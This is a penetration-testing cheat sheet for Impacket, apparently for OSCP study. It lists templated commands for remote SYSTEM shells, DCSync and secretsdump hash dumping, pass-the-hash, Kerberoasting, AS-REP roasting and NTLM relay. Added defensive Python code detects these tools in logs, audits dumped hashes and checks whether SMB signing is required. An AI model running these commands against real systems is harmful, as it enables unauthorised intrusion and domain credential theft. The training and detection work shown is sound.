FOOTHOLD Methodology Cheat-sheet
Post ✓ EXAM-SAFE medium :445:135:139:88:389

Impacket Suite: PsExec/WMIExec/SMBExec, Secretsdump, Kerberos Attacks and NTLM Relay

Reference for remote command execution with the Impacket tools (psexec/wmiexec/smbexec/dcomexec/atexec), credential dumping (secretsdump/DCSync), Kerberos attacks (GetNPUsers AS-REP, GetUserSPNs Kerberoasting, getST) and NTLM relay (ntlmrelayx).

Info: PREREQUISITES
  • SMB(445)/RPC(135)/WinRM access to the target
  • Local admin credentials for the RCE tools (psexec/wmiexec/smbexec)
  • A valid user list for AS-REP roasting; a domain user credential for Kerberoasting
  • impacket installed (pipx install impacket / apt install impacket-scripts)

Commands

impacket-psexec ✓ EXAM-SAFE admin
impacket-psexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}}
Interactive shell as SYSTEM by creating a service over SMB (noisy, drops a binary to disk) WADComs — Impacket-PsExec
impacket-wmiexec ✓ EXAM-SAFE admin
impacket-wmiexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}}
Semi-interactive command execution over WMI (DCOM/135); quieter than psexec and drops no binary to disk HackTricks — WMIExec / Lateral Movement
impacket-smbexec ✓ EXAM-SAFE admin
impacket-smbexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}}
Command execution via SMB + service; an alternative RCE that drops no binary to disk HackTricks — SMBExec
impacket-secretsdump ✓ EXAM-SAFE admin
impacket-secretsdump {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}}
Dump SAM, LSA secrets and (on a DC) NTDS.dit hashes remotely; the prime source for pass-the-hash HackTricks — Secretsdump / DCSync
impacket-secretsdump ✓ EXAM-SAFE admin
impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}}
DCSync: pull all domain hashes (krbtgt included) from the DC through replication HackTricks — DCSync via secretsdump
impacket-GetNPUsers ✓ EXAM-SAFE
impacket-GetNPUsers {{DOMAIN}}/ -dc-ip {{DC_IP}} -usersfile {{WORDLIST}} -no-pass -format hashcat
AS-REP Roasting: collect crackable hashes of users that do not require Kerberos pre-authentication HackTricks — AS-REP Roasting
impacket-GetUserSPNs ✓ EXAM-SAFE user
impacket-GetUserSPNs {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -outputfile spns.hash
Kerberoasting: request the TGS hashes of service accounts with SPNs (for offline cracking) HackTricks — Kerberoasting
impacket-getST ✓ EXAM-SAFE user
impacket-getST -spn cifs/{{DC_HOST}} -impersonate Administrator {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}}
Obtain a service ticket that impersonates another user via S4U (constrained delegation / RBCD) HackTricks — Constrained Delegation / S4U
impacket-ntlmrelayx ⚠ RESTRICTED
impacket-ntlmrelayx -tf targets.txt -smb2support
Relay captured NTLM authentication to other targets (only where SMB signing is not required) HackTricks — NTLM Relay / ntlmrelayx
impacket-atexec ✓ EXAM-SAFE admin
impacket-atexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} "whoami"
Single command execution through the Task Scheduler (atsvc); an alternative when the other RCE methods are blocked HackTricks — AtExec
impacket-psexec ✓ EXAM-SAFE admin
impacket-psexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}}
Pass-the-Hash with psexec/wmiexec/secretsdump: use the NTLM hash instead of a password (-hashes LM:NT) HackTricks — Pass the Hash with Impacket

Overview

Impacket is a network protocol library and toolset written in Python. In OSCP/AD work it is the backbone of remote command execution, credential dumping and Kerberos attacks. On Kali the tools ship with the impacket- prefix (e.g. impacket-psexec); when installed from source they live under examples/ as psexec.py.

Common authentication pattern: {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}}. For Pass-the-Hash, replace the password with -hashes LMHASH:NTHASH (use -hashes :{{NTHASH}} to leave the LM part empty). For Kerberos use -k -no-pass (with a ccache selected via KRB5CCNAME).

Remote Command Execution (RCE): Comparison

All of them require local admin credentials.

  • psexec: Creates a service and drops a binary to disk; gives a SYSTEM shell. The most reliable but also the noisiest; triggers AV.
  • wmiexec: Runs over WMI/DCOM (135), drops no binary to disk, semi-interactive. The quietest option and the one preferred in the OSCP.
  • smbexec: Service + SMB, a pseudo-shell that drops no binary.
  • dcomexec: RCE through DCOM objects (MMC20, ShellWindows); an alternative when psexec/wmiexec are blocked.
  • atexec: Single command through the Task Scheduler; the output is written to a file and read back.

Which one works is decided by the target's configuration; if one is blocked, try another.
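The wmiexec and smbexec entries above share one trait a defender can key on: the command's output is redirected to a file on a loopback admin share (\\127.0.0.1\ADMIN$ or \\127.0.0.1\C$) so the tool can read it back over SMB. The detection logic below is an added example, not code from the page or from Impacket; it runs over constructed Sysmon-style process-creation events and matches the default command templates of wmiexec (cmd.exe spawned by WmiPrvSE.exe, output to ADMIN$\__<timestamp>) and smbexec (a service child of services.exe using %TEMP%\execute.bat and C$\__output). Event field names and sample hosts are assumptions.

```python
"""Flag process-creation events matching the default command templates of
Impacket's wmiexec and smbexec. Added example with constructed sample events,
not code from the page or from Impacket."""
import re
from typing import Optional

# The common thread: the command's output is redirected to a file on a
# loopback admin share so the tool can read it back over SMB. Case-insensitive.
LOOPBACK_SHARE = re.compile(r"\\\\127\.0\.0\.1\\(ADMIN\$|C\$)\\", re.IGNORECASE)


def classify_event(event: dict) -> Optional[str]:
    """Return the tool whose default template the event matches, or None."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if not LOOPBACK_SHARE.search(cmd):
        return None
    low = cmd.lower()
    # wmiexec: cmd.exe spawned by the WMI provider host, output to ADMIN$\__<timestamp>
    if parent == "wmiprvse.exe" and "\\admin$\\__" in low:
        return "wmiexec"
    # smbexec: a service (child of services.exe) writes the command into
    # %TEMP%\execute.bat and collects the output from C$\__output
    if parent == "services.exe" and "execute.bat" in low and "__output" in low:
        return "smbexec"
    # Anything else redirecting to a loopback admin share still deserves a look
    return "loopback-share-redirect"


def scan(events: list) -> list:
    """Run classify_event over a batch and return the hits with host context."""
    hits = []
    for ev in events:
        tool = classify_event(ev)
        if tool:
            hits.append({"host": ev.get("Computer"), "tool": tool,
                         "command": ev.get("CommandLine")})
    return hits


# Constructed sample events using Sysmon Event ID 1 field names (not real telemetry).
SAMPLE_EVENTS = [
    {"Computer": "WS01", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"},
    {"Computer": "SRV02", "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\system32\cmd.exe /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & C:\Windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"Computer": "WS01", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c dir \\fileserver\share\docs"},
    {"Computer": "SRV03", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"cmd.exe /c hostname > \\127.0.0.1\C$\out.txt 2>&1"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit['host']}: {hit['tool']} :: {hit['command']}")
```

These strings are the defaults of the example scripts; an operator who edits the templates changes the indicators, so the generic loopback-share rule is the part worth keeping even when the tool-specific matches stop firing.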

Credential Dumping: secretsdump

  • Local: extracts SAM + LSA secrets + cached domain credentials.
  • -just-dc / -just-dc-ntlm: on a DC target, all domain hashes from NTDS.dit via DCSync (krbtgt included). The krbtgt hash is used for Golden Tickets.
  • The resulting NTLM hashes are used directly for Pass-the-Hash (psexec/wmiexec/evil-winrm) or cracked with hashcat.
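The same user:rid:lmhash:nthash::: lines that secretsdump prints are also what a password audit consumes. The parser and audit below are an added example, not code from the page or from Impacket: they read a constructed dump (every hash in it is made up), skip banner and Kerberos-key lines, and report accounts with an empty password (NT hash 31d6cfe0d16ae931b73c59d7e0c089c0), accounts that still store an LM hash (anything other than aad3b435b51404eeaad3b435b51404ee), and clusters of accounts sharing one NT hash.

```python
"""Parse secretsdump-style hash lines and audit them for weak password hygiene.
Added example; the sample output below is constructed, not a real dump."""
import re
from collections import defaultdict
from typing import Dict, List

# Well-known constants: NT hash of the empty password, and the "no LM hash" value.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

# secretsdump prints one line per account: [DOMAIN\]user:rid:lmhash:nthash:::
HASH_LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.IGNORECASE)


def parse_secretsdump(text: str) -> List[Dict[str, str]]:
    """Return one dict per hash line; banner and Kerberos-key lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = HASH_LINE.match(line.strip())
        if m:
            d = m.groupdict()
            d["lm"], d["nt"] = d["lm"].lower(), d["nt"].lower()
            entries.append(d)
    return entries


def audit(entries: List[Dict[str, str]]) -> Dict[str, list]:
    """Flag empty passwords, LM hash storage, and NT hash reuse across accounts."""
    by_nt = defaultdict(list)
    report = {"empty_password": [], "lm_hash_stored": [], "reused_nt_hash": []}
    for e in entries:
        if e["nt"] == EMPTY_NT_HASH:
            report["empty_password"].append(e["user"])
        if e["lm"] != EMPTY_LM_HASH:
            report["lm_hash_stored"].append(e["user"])
        # Machine accounts have random passwords; keep them out of reuse clusters.
        if not e["user"].endswith("$"):
            by_nt[e["nt"]].append(e["user"])
    report["reused_nt_hash"] = sorted(u for u in by_nt.values() if len(u) > 1)
    return report


# Constructed sample in secretsdump's NTDS output format; every hash is made up.
SAMPLE_OUTPUT = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
CORP\\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
CORP\\jdoe:1106:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
CORP\\legacy_app:1107:44444444444444444444444444444444:55555555555555555555555555555555:::
CORP\\WS01$:1108:aad3b435b51404eeaad3b435b51404ee:66666666666666666666666666666666:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:constructed-placeholder-not-a-hash-line
"""

if __name__ == "__main__":
    for key, value in audit(parse_secretsdump(SAMPLE_OUTPUT)).items():
        print(f"{key}: {value}")
```

A shared NT hash between a privileged and a service account is exactly the condition that lets one cracked or passed hash move laterally, which is why reuse clusters rank above individual weak passwords in a remediation list.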

Kerberos Attacks

  • GetNPUsers (AS-REP Roasting): the AS-REP of users with DONT_REQ_PREAUTH set is requested without pre-authentication and the resulting hash is cracked offline. Needs no credentials (-no-pass), only a user list.
  • GetUserSPNs (Kerberoasting): the TGS-REP hashes of service accounts with an SPN are requested. Any valid domain user credential suffices. The resulting $krb5tgs$ hashes are cracked with hashcat mode 13100.
  • getST (S4U / delegation): in constrained delegation or Resource-Based Constrained Delegation (RBCD) scenarios, produces a service ticket impersonating a privileged user via -impersonate.
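Both roasting techniques leave a footprint on the domain controller: AS-REP roasting shows up as a 4768 TGT request with Pre-Authentication Type 0 and RC4 (0x17), and Kerberoasting as 4769 service-ticket requests with RC4 for user-account SPNs, typically many of them from one client in a short span. The detection below is an added example, not code from the page or from Impacket; it runs over constructed events that use the Windows Security log field names, and the burst threshold, sample IPs and account names are assumptions.

```python
"""Detection logic for AS-REP roasting and Kerberoasting indicators in Windows
Security events 4768/4769. Added example over constructed events; not from the page."""
from collections import defaultdict
from typing import Dict, List

RC4_HMAC = "0x17"        # TicketEncryptionType for RC4; AES128/AES256 are 0x11/0x12
KERBEROAST_BURST = 3     # distinct RC4 service tickets from one client that trigger an alert


def detect(events: List[Dict[str, str]]) -> Dict[str, object]:
    """Return AS-REP roast candidates, RC4 TGS requests per client, and burst clients."""
    asrep: List[str] = []
    rc4_tgs: Dict[str, List[str]] = defaultdict(list)
    for ev in events:
        enc = ev.get("TicketEncryptionType", "").lower()
        if ev["EventID"] == "4768":
            # AS-REP roast: TGT issued with no pre-authentication (PreAuthType 0)
            # and RC4, the combination GetNPUsers produces for DONT_REQ_PREAUTH users.
            if (ev.get("PreAuthType") == "0" and enc == RC4_HMAC
                    and ev.get("Status") == "0x0"):
                asrep.append(ev["TargetUserName"])
        elif ev["EventID"] == "4769":
            svc = ev["ServiceName"]
            # Kerberoast: RC4 service ticket for a user-account SPN. Skip krbtgt
            # (TGT renewals) and machine accounts (name ends with $).
            if (enc == RC4_HMAC and ev.get("Status") == "0x0"
                    and svc.lower() != "krbtgt" and not svc.endswith("$")):
                client = ev["IpAddress"]
                if svc not in rc4_tgs[client]:
                    rc4_tgs[client].append(svc)
    burst = sorted(ip for ip, svcs in rc4_tgs.items() if len(svcs) >= KERBEROAST_BURST)
    return {"asrep_roast": asrep,
            "rc4_tgs_by_client": dict(rc4_tgs),
            "kerberoast_burst": burst}


# Constructed events using Windows Security log field names (not real data).
SAMPLE_EVENTS = [
    {"EventID": "4768", "TargetUserName": "svc_legacy", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.0.0.50"},
    {"EventID": "4768", "TargetUserName": "jdoe", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.0.0.21"},
    {"EventID": "4769", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17",
     "Status": "0x0", "IpAddress": "::ffff:10.0.0.50"},
    {"EventID": "4769", "ServiceName": "svc_web", "TicketEncryptionType": "0x17",
     "Status": "0x0", "IpAddress": "::ffff:10.0.0.50"},
    {"EventID": "4769", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17",
     "Status": "0x0", "IpAddress": "::ffff:10.0.0.50"},
    {"EventID": "4769", "ServiceName": "krbtgt", "TicketEncryptionType": "0x17",
     "Status": "0x0", "IpAddress": "::ffff:10.0.0.50"},
    {"EventID": "4769", "ServiceName": "WS01$", "TicketEncryptionType": "0x17",
     "Status": "0x0", "IpAddress": "::ffff:10.0.0.21"},
    {"EventID": "4769", "ServiceName": "svc_sql", "TicketEncryptionType": "0x12",
     "Status": "0x0", "IpAddress": "::ffff:10.0.0.21"},
]

if __name__ == "__main__":
    for key, value in detect(SAMPLE_EVENTS).items():
        print(f"{key}: {value}")
```

In domains that still negotiate RC4 for legitimate clients the RC4 filter alone is noisy; the per-client burst count is what separates a roasting sweep from ordinary ticket traffic, and moving service accounts to AES-only keys removes the RC4 signal at its source.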

NTLM Relay: ntlmrelayx

On targets where SMB signing is not required, relays captured NTLM authentication (e.g. poisoned with Responder) to other machines; on success it executes commands, dumps the SAM, or relays to LDAP for ADCS/RBCD attacks. examSafety: restricted; the automated/MITM components must be used with care in the OSCP, confirm the exam scope.
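"SMB signing off" is decided by two bits in the SecurityMode field of the server's SMB2 NEGOTIATE response: SIGNING_ENABLED (0x0001) only advertises support, SIGNING_REQUIRED (0x0002) is what actually defeats a relayed session. The parser below is an added example, not code from the page or from Impacket: it reads those bits from a response and words the result as an audit verdict. The response bytes are constructed by a helper following the MS-SMB2 header and body layout, and the dialect and size values used are assumptions for illustration.

```python
"""Parse the SecurityMode field of an SMB2 NEGOTIATE response to tell whether a
server merely supports signing or requires it. Added example; the response bytes
below are constructed for illustration, not a real capture."""
import struct
from typing import Dict

SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002
SMB2_HEADER_LEN = 64


def build_negotiate_response(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Constructed minimal SMB2 NEGOTIATE response: 64-byte header plus the
    fixed-length body (StructureSize 65). Field order follows MS-SMB2."""
    header = b"\xfeSMB" + struct.pack(
        "<HHIHHIIQIIQ16s",
        64,            # StructureSize
        0,             # CreditCharge
        0,             # Status
        0,             # Command: SMB2 NEGOTIATE
        1,             # CreditResponse
        1,             # Flags: SMB2_FLAGS_SERVER_TO_REDIR
        0,             # NextCommand
        0,             # MessageId
        0,             # Reserved
        0,             # TreeId
        0,             # SessionId
        b"\x00" * 16,  # Signature
    )
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        65, security_mode, dialect,
        0,                     # NegotiateContextCount
        b"\x00" * 16,          # ServerGuid
        0,                     # Capabilities
        65536, 65536, 65536,   # MaxTransactSize / MaxReadSize / MaxWriteSize
        0, 0,                  # SystemTime, ServerStartTime
        0, 0,                  # SecurityBufferOffset / SecurityBufferLength
        0,                     # NegotiateContextOffset
    )
    return header + body


def parse_signing_mode(response: bytes) -> Dict[str, object]:
    """Extract dialect and signing flags; reject anything that is not an SMB2 NEGOTIATE response."""
    if response[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 packet (SMB1 starts with \\xffSMB)")
    command = struct.unpack_from("<H", response, 12)[0]
    if command != 0:
        raise ValueError(f"not a NEGOTIATE response (command {command})")
    struct_size, security_mode, dialect = struct.unpack_from("<HHH", response, SMB2_HEADER_LEN)
    if struct_size != 65:
        raise ValueError(f"unexpected NEGOTIATE body size {struct_size}")
    return {
        "dialect": f"0x{dialect:04x}",
        "signing_enabled": bool(security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
        "signing_required": bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED),
    }


def signing_verdict(parsed: Dict[str, object]) -> str:
    """Audit wording: only SIGNING_REQUIRED protects a session against relay."""
    if parsed["signing_required"]:
        return "OK: SMB signing required"
    if parsed["signing_enabled"]:
        return "WEAK: signing supported but not required"
    return "WEAK: signing not enabled"


if __name__ == "__main__":
    for mode in (0x0003, 0x0001):
        print(signing_verdict(parse_signing_mode(build_negotiate_response(mode))))
```

Against a live host the same parser applies to the NEGOTIATE response captured from the wire; on the Windows side the equivalent fix is the RequireSecuritySignature setting on the SMB server, which is what turns the second bit on.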

Notes

  • Clock synchronisation is critical for Kerberos: on KRB_AP_ERR_SKEW use ntpdate {{DC_IP}} or faketime.
  • Passing -dc-ip {{DC_IP}} and adding the DC FQDN to /etc/hosts avoids name-resolution problems.
  • If the clock or DNS is wrong, the Kerberos-based tools (GetUserSPNs, getST) fail silently.